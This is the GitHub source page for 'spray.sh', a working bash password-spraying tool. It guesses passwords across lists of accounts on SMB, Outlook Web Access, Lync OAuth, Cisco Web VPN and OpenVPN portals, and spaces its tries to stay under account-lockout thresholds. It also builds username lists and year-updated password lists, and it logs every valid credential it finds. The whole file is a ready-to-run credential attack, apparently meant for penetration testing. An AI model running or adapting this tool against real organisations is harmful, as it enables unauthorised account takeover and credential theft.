-
Notifications
You must be signed in to change notification settings - Fork 137
/
spray.sh
executable file
·407 lines (364 loc) · 17.2 KB
/
spray.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
#!/bin/bash
echo -e "\nSpray 2.1 the Password Sprayer by Jacob Wilkin(Greenwolf)\n"
if [ $# -eq 0 ] || [ "$1" == "-help" ] || [ "$1" == "-h" ] || [ "$1" == "--help" ] ; then
echo "This script will password spray a target over a period of time"
echo "It requires password policy as input so accounts are not locked out"
echo "Useage: spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <Domain> <OptionalSkipUsernameUsernameSpray>"
echo -e "Example: spray.sh -smb 192.168.0.1 users.txt passwords.txt 1 35 CORPORATION\n"
echo -e "Example Skipping Username:Username Spray: spray.sh -smb 192.168.0.1 users.txt passwords.txt 1 35 CORPORATION NOUSERUSER\n"
echo "To password spray an OWA portal, a file must be created of the POST request with Username: [email protected], and Password: spraypassword"
echo "Useage: spray.sh -owa <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <RequestFile>"
echo -e "Example: spray.sh -owa 192.168.0.1 usernames.txt passwords.txt 1 35 post-request.txt\n"
echo "To password spray an lync service, a lync autodiscover url or a url that returns the www-authenticate header must be provided along with a list of email addresses"
echo "Useage: spray.sh -lync <lyncDiscoverOrAutodiscoverUrl> <emailAddressList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes>"
echo "Example: spray.sh -lync https://lyncdiscover.company.com/ emails.txt passwords.txt 1 35\n"
echo -e "Example: spray.sh -lync https://lyncweb.company.com/Autodiscover/AutodiscoverService.svc/root/oauth/user emails.txt passwords.txt 1 35\n"
echo "To password spray an CISCO Web VPN a target portal or server hosting a portal must be provided"
echo "Useage: spray.sh -cisco <targetURL> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes>"
echo -e "Example: spray.sh -cicso 192.168.0.1 usernames.txt passwords.txt 1 35\n"
echo "To password spray an OpenVPN web portal a target IP address and port must be provided"
echo "Useage: spray.sh -ovpn <targetIP> <targetPort> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes>"
echo -e "Example: spray.sh -ovpn 192.168.0.1 943 usernames.txt passwords.txt 1 35\n"
echo -e "\nIt is also possible to update the supplied 2016/2017 password list to the current year"
echo "Useage: spray.sh -passupdate <passwordList>"
echo "Example: spray.sh -passupdate passwords.txt"
echo -e "\nAn optional company name can also be provided to add to the list:"
echo "Useage: spray.sh -passupdate <passwordList> <CompanyName>"
echo "Example: spray.sh -passupdate passwords.txt Company"
echo -e "\nA username list can also be generated from a list of common names:"
echo "Useage: spray.sh -genusers <firstnames> <lastnames> \"<<fi><li><fn><ln>>\""
echo "Example: spray.sh -genusers english-first-1000.txt english-last-1000.txt \"<fi><ln>\""
echo "Example: spray.sh -genusers english-first-1000.txt english-last-1000.txt \"<fn>.<ln>\""
echo ""
exit 0
fi
if [ "$1" == "-passupdate" ] || [ "$1" == "--passupdate" ] || [ "$1" == "passupdate" ] ; then
if [ $# -eq 3 ] ; then
touch temp-passwords.txt
echo "$31" >> temp-passwords.txt
echo "$316" >> temp-passwords.txt
echo "$317" >> temp-passwords.txt
echo "$32016" >> temp-passwords.txt
echo "$32017" >> temp-passwords.txt
cat $2 >> temp-passwords.txt
rm $2
mv temp-passwords.txt $2
fi
echo -n "Updating Password List... "
longdate1=$(date +%Y)
longdate2=$(($longdate1-1))
shortdate1=$(date +%y)
if [ "$shortdate1" == "00" ] ; then
shortdate2="99"
else
shortdate2=$(($shortdate1-1))
fi
#sed -i.bak s/2017/$longdate1/g $2
#sed -i.bak s/2016/$longdate2/g $2
sed -i.bak s/17/$shortdate1/g $2
sed -i.bak s/16/$shortdate2/g $2
echo "Complete"
exit 0
fi
if [ "$1" == "-genusers" ] || [ "$1" == "--genusers" ] || [ "$1" == "genusers" ] ; then
#spray.sh -genusers <firstnames> <lastnames> "<UsernameFormat>""
touch generated-usernames.tmp
echo "Generating Username list..."
for firstname in $(cat $2); do
for lastname in $(cat $3); do
fi=${firstname:0:1}
li=${lastname:0:1}
echo "$4" | sed "s/<fi>/$fi/" | sed "s/<li>/$li/" | sed "s/<fn>/$firstname/" | sed "s/<ln>/$lastname/" >> generated-usernames.tmp
done
done
cat generated-usernames.tmp | sort -u > generated-usernames.txt
rm generated-usernames.tmp
echo -e "Username list generated in generated-usernames.txt\n"
exit 0
fi
if [ "$1" == "-calc-throttle" ] || [ "$1" == "--calc-throttle" ] || [ "$1" == "calc-throttle" ] ; then
numusers=$(cat $2 | wc -l | sed 's/ //g')
lockouttime=$3
throttletime=$(($lockouttime*60*10000/$numusers))
echo "To spray $numusers users over $lockouttime minutes,"
echo "Intruder Throttle(milliseconds) should be: $throttletime"
echo "Threads should be: 1"
exit 0
fi
if [ $# -lt 5 ] ; then
echo "Not Enough Arguments"
echo "Useage: spray.sh <targetIP> <usernameList> <passwordList> <LockoutThreshold> <LockoutResetTimerInMinutes>"
echo -e "Example: spray.sh 192.168.0.1 users.txt passwords.txt 4 30\n"
exit 0
fi
#Internal Network SMB Spraying Code
if [ "$1" == "-smb" ] || [ "$1" == "--smb" ] || [ "$1" == "smb" ] ; then
mkdir -p logs
set +H
domain=$7
nouseruser=$8
target=$2
cp $3 logs/username-removed-successes.txt
userslist="logs/username-removed-successes.txt"
passwordlist=$4
lockout=$5
lockoutduration=$(($6 * 60))
counter=0
touch logs/spray-logs.txt
#Initial spray for same username as password
if [ "$nouseruser" == "" ] ; then
time=$(date +%H:%M:%S)
echo "$time Spraying with password: Users Username"
for u in $(cat $userslist); do
(echo -n "[*] user $u%$u " && rpcclient -U "$domain/$u%$u" -c "getusername;quit" $target) >> logs/spray-logs.txt 2>&1
done
cat logs/spray-logs.txt | grep -v "Cannot"
counter=$(($counter + 1))
if [ $counter -eq $lockout ] ; then
counter=0
sleep $lockoutduration
fi
fi
#Then start on list
while read password; do
time=$(date +%H:%M:%S)
echo "$time Spraying with password: $password"
for u in $(cat $userslist); do
(echo -n "[*] user $u%$password " && rpcclient -U "$domain/$u%$password" -c "getusername;quit" $target) >> logs/spray-logs.txt 2>&1
done
cat logs/spray-logs.txt | grep -v "Cannot"
cat logs/spray-logs.txt | grep -v "Cannot" | cut -d ' ' -f 3 | cut -d '%' -f 1 | sort -u > logs/usernamestoremove.txt
cat logs/spray-logs.txt | grep -v "Cannot" | cut -d ' ' -f 3 | sort -u > logs/credentials.txt
for user in $(cat logs/usernamestoremove.txt); do
sed -i.bak "/$user/d" $userslist
done
rm logs/usernamestoremove.txt
counter=$(($counter + 1))
if [ $counter -eq $lockout ] ; then
counter=0
sleep $lockoutduration
fi
done < $passwordlist
exit 0
fi
#Alpha OWA Code
if [ "$1" == "-owa" ] || [ "$1" == "--owa" ] || [ "$1" == "owa" ] ; then
mkdir -p logs
set +H
target=$2
cp $3 logs/username-removed-successes.txt
userslist="logs/username-removed-successes.txt"
passwordlist=$4
lockout=$5
lockoutduration=$(($6 * 60))
postrequest=$7
counter=0
touch logs/spray-logs.txt
# convert line endings on POST data; required if you C&P from Burp.
sed -i.bak 's/.$//' $postrequest
#Initial spray for same username as password
time=$(date +%H:%M:%S)
echo "$time Spraying with password: Users Username"
for u in $(cat $userslist); do
#Grep out the cookies (avoids missing javascript generated cookies)
cookies=$(cat $postrequest | grep "Cookie:")
#Grep out the post data and replace filler data with username/password combo
data=$(cat $postrequest | grep "^$" -A 1 | tail -n 1 | sed "s/sprayuser/$u/" | sed "s/spraypassword/$u/")
#Grep out path to OWA post signin
path=$(cat $postrequest | grep "POST" | cut -d ' ' -f 2)
#Create target + path from target + path
targetpath="$target$path"
# silently follow redirctions and process additional cookies, send cookies as header, send data and output size of response, save this along with creds to log file
(curl -k -s -L -b cookies.txt $targetpath -H "$cookies" -d "$data" -w 'size: %{size_download}\n' -o /dev/null | cut -d ' ' -f 2 | tr '\n' ' ' && echo "$u%$u") >> logs/spray-logs.txt
rm -f cookies.txt
done
# Check if there are more than one type of reponse
lines=$(cat logs/spray-logs.txt | cut -d ' ' -f 1 | sort | uniq -c | sort | wc -l | sed 's/ //g')
if [ "$lines" -ge "2" ]; then
# Find least common response length, should be a correct credential combo
lowest=$(cat logs/spray-logs.txt | cut -d ' ' -f 1 | sort | uniq -c | sort | cut -d ' ' -f 5 | head -n 1)
cat logs/spray-logs.txt | grep "$lowest"
fi
counter=$(($counter + 1))
if [ $counter -eq $lockout ] ; then
counter=0
sleep $lockoutduration
fi
#Then start on list
for password in $(cat $passwordlist); do
time=$(date +%H:%M:%S)
echo "$time Spraying with password: $password"
for u in $(cat $userslist); do
cookies=$(cat $postrequest | grep "Cookie:")
data=$(cat $postrequest | grep "^$" -A 1 | tail -n 1 | sed "s/sprayuser/$u/" | sed "s/spraypassword/$password/")
path=$(cat $postrequest | grep "POST" | cut -d ' ' -f 2)
targetpath="$target$path"
(curl -k -s -L -b cookies.txt $targetpath -H "$cookies" -d "$data" -w 'size: %{size_download}\n' -o /dev/null | cut -d ' ' -f 2 | tr '\n' ' ' && echo "$u%$password") >> logs/spray-logs.txt
rm -f cookies.txt
done
lines=$(cat logs/spray-logs.txt | cut -d ' ' -f 1 | sort | uniq -c | sort | wc -l | sed 's/ //g')
if [ "$lines" -ge "2" ]; then
lowest=$(cat logs/spray-logs.txt | cut -d ' ' -f 1 | sort | uniq -c | sort | cut -d ' ' -f 5 | head -n 1)
cat logs/spray-logs.txt | grep "$lowest"
cat logs/spray-logs.txt | grep "$lowest" | cut -d ' ' -f 2 | cut -d '%' -f 1 | sort -u > logs/usernamestoremove.txt
cat logs/spray-logs.txt | grep "$lowest" | cut -d ' ' -f 2 | sort -u > logs/credentials.txt
fi
for completeuser in $(cat logs/usernamestoremove.txt); do
sed -i.bak "/$completeuser/d" $userslist
done
rm logs/usernamestoremove.txt
counter=$(($counter + 1))
if [ $counter -eq $lockout ] ; then
counter=0
sleep $lockoutduration
fi
done
fi
#Lync Password Spraying
if [ "$1" == "-lync" ] || [ "$1" == "--lync" ] || [ "$1" == "lync" ] ; then
mkdir -p logs
set +H
target=$2
cp $3 logs/username-removed-successes.txt
userslist="logs/username-removed-successes.txt"
passwordlist=$4
lockout=$5
lockoutduration=$(($6 * 60))
postrequest=$7
counter=0
touch logs/spray-logs.txt
#Find proper url by redirecting from lyndiscover subdomains to place that lists autodiscover links, then grab oauth link
autodiscover=$(curl -k -l $target 2>&1 | tr '"' '\n' | grep http | grep oauth)
if [ -z "$autodiscover" ] ; then
oauthaddress=$(curl -k -v -s $target 2>&1> /dev/null | grep -i "Www-Authenticate:" | grep -i "MsRtcOAuth" | tr '"' '\n' | grep -i http)
if [ -z "$oauthaddress" ] ; then
echo "URL not valid for discover redirect or autodiscover link"
exit
fi
else
#Use oauth link to get the www-authenticate address to send the login request too
echo "Redirect Successful..."
oauthaddress=$(curl -k -v -s $autodiscover 2>&1> /dev/null | grep -i "Www-Authenticate:" | grep -i "MsRtcOAuth" | tr '"' '\n' | grep -i http)
if [ -z "$oauthaddress" ] ; then
echo "Could not locate oauth request in server response"
exit
fi
fi
#Then start on list
for password in $(cat $passwordlist); do
time=$(date +%H:%M:%S)
echo "$time Spraying with password: $password"
for u in $(cat $userslist); do
access_token=$(curl -k -s --data "grant_type=password&username=$u&password=$password" $oauthaddress)
#access_token=""
#echo "BREAKBREAKBREAKBREAK -------- xxXXXXX $u%$password"
#echo "$u%$password"
#echo "$access_token"
if echo $access_token | grep -q "access_token" ; then
echo "Valid Credentials $u%$password" >> logs/spray-logs.txt
else
echo "Incorrect $u%$password" >> logs/spray-logs.txt
fi
done
cat logs/spray-logs.txt | grep "Valid Credentials"
cat logs/spray-logs.txt | grep "Valid Credentials" | cut -d ' ' -f 3 | cut -d '%' -f 1 | sort -u > logs/usernamestoremove.txt
cat logs/spray-logs.txt | grep "Valid Credentials" | cut -d ' ' -f 3 | sort -u > logs/credentials.txt
for completeuser in $(cat logs/usernamestoremove.txt); do
sed -i.bak "/$completeuser/d" $userslist
done
rm logs/usernamestoremove.txt
counter=$(($counter + 1))
if [ $counter -eq $lockout ] ; then
counter=0
sleep $lockoutduration
fi
done
fi
#CISCO Web VPN Password Spraying
if [ "$1" == "-cisco" ] || [ "$1" == "--cisco" ] || [ "$1" == "cisco" ] ; then
mkdir -p logs
set +H
cp $3 logs/username-removed-successes.txt
userslist="logs/username-removed-successes.txt"
passwordlist=$4
lockout=$5
lockoutduration=$(($6 * 60))
postrequest=$7
counter=0
touch logs/spray-logs.txt
target=$(echo $2 | cut -d '/' -f -3)
targetpath="$target/+webvpn+/index.html"
targetlogout="$target/+webvpn+/webvpn_logout.html"
#Then start on list
for password in $(cat $passwordlist); do
time=$(date +%H:%M:%S)
echo "$time Spraying with password: $password"
for u in $(cat $userslist); do
cookies="webvpn=; webvpnc=; webvpn_portal=; webvpnSharePoint=; webvpnlogin=1; webvpnLang=en;"
ciscologin=$(curl -k -s -L -b cookies.txt $targetpath -H "$cookies" --data "tgroup=&next=&tgcookieset=&username=$u&password=$password&Login=Login")
if echo $ciscologin | grep -q "SSL VPN Service" | grep "webvpn_logout" ; then
echo "Valid Credentials $u%$password" >> logs/spray-logs.txt
curl -k -s -b cookies.txt $targetlogout
else
echo "Incorrect $u%$password" >> logs/spray-logs.txt
fi
rm -f cookies.txt
done
cat logs/spray-logs.txt | grep "Valid Credentials"
cat logs/spray-logs.txt | grep "Valid Credentials" | cut -d ' ' -f 3 | cut -d '%' -f 1 | sort -u > logs/usernamestoremove.txt
cat logs/spray-logs.txt | grep "Valid Credentials" | cut -d ' ' -f 3 | sort -u > logs/credentials.txt
for completeuser in $(cat logs/usernamestoremove.txt); do
sed -i.bak "/$completeuser/d" $userslist
done
rm logs/usernamestoremove.txt
counter=$(($counter + 1))
if [ $counter -eq $lockout ] ; then
counter=0
sleep $lockoutduration
fi
done
fi
#OpenVPN Web Portal Password Spraying
if [ "$1" == "-ovpn" ] || [ "$1" == "--ovpn" ] || [ "$1" == "ovpn" ] ; then
mkdir -p logs
set +H
cp $4 logs/username-removed-successes.txt
userslist="logs/username-removed-successes.txt"
passwordlist=$5
lockout=$6
lockoutduration=$(($7 * 60))
postrequest=$8
counter=0
touch logs/spray-logs.txt
target="https://$(echo $2 | cut -d '/' -f -3):$3"
targetpath="$target/rest/GetUserlogin"
#Then start on list
for password in $(cat $passwordlist); do
time=$(date +%H:%M:%S)
echo "$time Spraying with password: $password"
for u in $(cat $userslist); do
ovpnlogin=$(curl -k -s -L -u $u:$password $targetpath)
if echo $ovpnlogin | grep -q "OpenVPN client config"; then
echo "Valid Credentials $u%$password" >> logs/spray-logs.txt
else
if echo $ovpnlogin | grep -q "LOCKOUT"; then
echo "Account locked out! Try changing password policy setting"
exit
fi
echo "Incorrect $u%$password" >> logs/spray-logs.txt
fi
done
cat logs/spray-logs.txt | grep "Valid Credentials"
cat logs/spray-logs.txt | grep "Valid Credentials" | cut -d ' ' -f 3 | cut -d '%' -f 1 | sort -u > logs/usernamestoremove.txt
cat logs/spray-logs.txt | grep "Valid Credentials" | cut -d ' ' -f 3 | sort -u > logs/credentials.txt
for completeuser in $(cat logs/usernamestoremove.txt); do
sed -i.bak "/$completeuser/d" $userslist
done
rm logs/usernamestoremove.txt
counter=$(($counter + 1))
if [ $counter -eq $lockout ] ; then
counter=0
sleep $lockoutduration
fi
done
fi